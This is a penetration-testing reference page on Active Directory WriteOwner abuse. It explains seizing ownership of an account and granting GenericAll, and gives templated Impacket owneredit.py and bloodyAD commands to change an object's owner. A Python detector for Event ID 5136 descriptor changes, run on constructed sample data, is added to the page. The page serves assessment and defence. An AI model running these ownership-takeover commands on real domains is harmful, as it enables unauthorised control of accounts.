PRIMARY CATEGORY → DACL ABUSE
Theory
This DACL abuse can be carried out during an assessment when an operator has compromised a domain account that holds the WriteOwner right over another domain account.
Once the owner of the target account has been set to the account the attacker controls, the adversary can add, delete or modify any existing ACE in the object's DACL and thereby gain complete control over that account, for example by granting themselves FullControl (GenericAll) on it.
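From the defender's side, the two steps described above (owner change, then a GenericAll grant) both rewrite the nTSecurityDescriptor attribute, which Windows audits as Event ID 5136 ("A directory service object was modified") when object-modification auditing is enabled: the old and new security descriptors are logged as a "Value Deleted" / "Value Added" pair sharing a CorrelationID. The following detection logic is an added example and not part of the original page or of the tools it lists; the event records, the domain SID and the account names are constructed sample data, and the field names mirror the 5136 event layout.

```python
import re
from collections import defaultdict

# Event ID 5136: old and new nTSecurityDescriptor values arrive as a
# "Value Deleted" / "Value Added" pair with the same CorrelationID.
EVENT_DS_OBJECT_MODIFIED = 5136

# Principals for which ownership or GenericAll is expected on AD objects:
# SDDL aliases (Domain Admins, Enterprise Admins, SYSTEM, Builtin Admins)
# and the RIDs of Domain Admins (512) / Enterprise Admins (519).
TRUSTED_ALIASES = {"DA", "EA", "SY", "BA"}
TRUSTED_RIDS = {"512", "519"}
GENERIC_ALL_MASK = 0x10000000  # GA as a hex access mask

# Constructed sample values (not real identifiers).
ATTACKER_SID = "S-1-5-21-1004336348-1177238915-682003330-1105"
TARGET_DN = "CN=svc_backup,OU=Service Accounts,DC=corp,DC=example"
DEFAULT_ACES = "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(A;;RPLCLORC;;;AU)"


def parse_owner(sddl):
    """Return the owner from an SDDL string: a two-letter alias or a full SID."""
    m = re.match(r"O:(S-[0-9-]+|[A-Z]{2})", sddl)
    return m.group(1) if m else None


def is_trusted_principal(principal):
    if principal in TRUSTED_ALIASES:
        return True
    return principal.rsplit("-", 1)[-1] in TRUSTED_RIDS


def generic_all_grantees(sddl):
    """Trustees holding GenericAll through access-allowed ACEs in the DACL."""
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    grantees = set()
    for ace in re.findall(r"\(([^)]*)\)", m.group(2) if m else ""):
        parts = ace.split(";")
        if len(parts) < 6 or parts[0] != "A":
            continue
        rights, trustee = parts[2], parts[5]
        if rights.startswith("0x"):
            has_ga = int(rights, 16) & GENERIC_ALL_MASK == GENERIC_ALL_MASK
        else:  # rights are a run of two-letter codes, e.g. "GA" or "CCDCLC..."
            has_ga = "GA" in {rights[i:i + 2] for i in range(0, len(rights), 2)}
        if has_ga:
            grantees.add(trustee)
    return grantees


def detect_owner_takeover(events):
    """Pair old/new descriptors per CorrelationID and flag an owner change to an
    untrusted principal, or a GenericAll ACE that newly appears for one."""
    pairs = defaultdict(dict)
    for ev in events:
        if ev["EventID"] != EVENT_DS_OBJECT_MODIFIED:
            continue
        if ev["AttributeLDAPDisplayName"] != "nTSecurityDescriptor":
            continue
        pairs[(ev["ObjectDN"], ev["CorrelationID"])][ev["OperationType"]] = ev

    findings = []
    for (dn, _), ops in pairs.items():
        old, new = ops.get("Value Deleted"), ops.get("Value Added")
        if not old or not new:
            continue
        old_sd, new_sd = old["AttributeValue"], new["AttributeValue"]
        old_owner, new_owner = parse_owner(old_sd), parse_owner(new_sd)
        if old_owner != new_owner and not is_trusted_principal(new_owner):
            findings.append({"kind": "owner_changed", "object": dn,
                             "actor": new["SubjectUserName"],
                             "old_owner": old_owner, "new_owner": new_owner})
        added = {t for t in generic_all_grantees(new_sd) - generic_all_grantees(old_sd)
                 if not is_trusted_principal(t)}
        if added:
            findings.append({"kind": "generic_all_granted", "object": dn,
                             "actor": new["SubjectUserName"], "grantees": added})
    return findings


def _ev(corr, op, sddl, actor="jdoe"):
    return {"EventID": 5136, "CorrelationID": corr, "SubjectUserName": actor,
            "ObjectDN": TARGET_DN, "AttributeLDAPDisplayName": "nTSecurityDescriptor",
            "OperationType": op, "AttributeValue": sddl}


# Constructed 5136 sequence: owner rewritten, GA granted, then an admin restores the owner.
SD_DEFAULT = "O:DAG:DAD:AI" + DEFAULT_ACES
SD_OWNED = f"O:{ATTACKER_SID}G:DAD:AI" + DEFAULT_ACES
SD_GA = f"O:{ATTACKER_SID}G:DAD:AI(A;;GA;;;{ATTACKER_SID})" + DEFAULT_ACES
SAMPLE_EVENTS = [
    _ev("{c0ffee00-0000-4000-8000-000000000001}", "Value Deleted", SD_DEFAULT),
    _ev("{c0ffee00-0000-4000-8000-000000000001}", "Value Added", SD_OWNED),
    _ev("{c0ffee00-0000-4000-8000-000000000002}", "Value Deleted", SD_OWNED),
    _ev("{c0ffee00-0000-4000-8000-000000000002}", "Value Added", SD_GA),
    _ev("{c0ffee00-0000-4000-8000-000000000003}", "Value Deleted", SD_GA, "admin"),
    _ev("{c0ffee00-0000-4000-8000-000000000003}", "Value Added", SD_DEFAULT, "admin"),
]

if __name__ == "__main__":
    for finding in detect_owner_takeover(SAMPLE_EVENTS):
        print(finding)
```

The third pair (the administrator resetting the owner to Domain Admins) is deliberately not flagged, so the rule reports only the two attacker-side descriptor changes. In production the same pairing logic applies to 5136 events pulled from a SIEM; the alias and RID allow-list should be extended with whatever delegation model the domain actually uses.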
Abuse - UNIX-like
Impacket’s Owneredit.py
owneredit.py -dc-ip '<DC_IP>' -new-owner '<CONTROLLED_ACCOUNT>' -target '<TARGET_ACCOUNT>' -action write '<DOMAIN>/<USER>:<PASSWD>'
BloodyAD
Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd bloodyAD && python3 -m venv .venv
. .venv/bin/activate && pip3 install -r requirements.txt
Usage
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' set owner '<TARGET_ACCOUNT>' '<CONTROLLED_ACCOUNT>'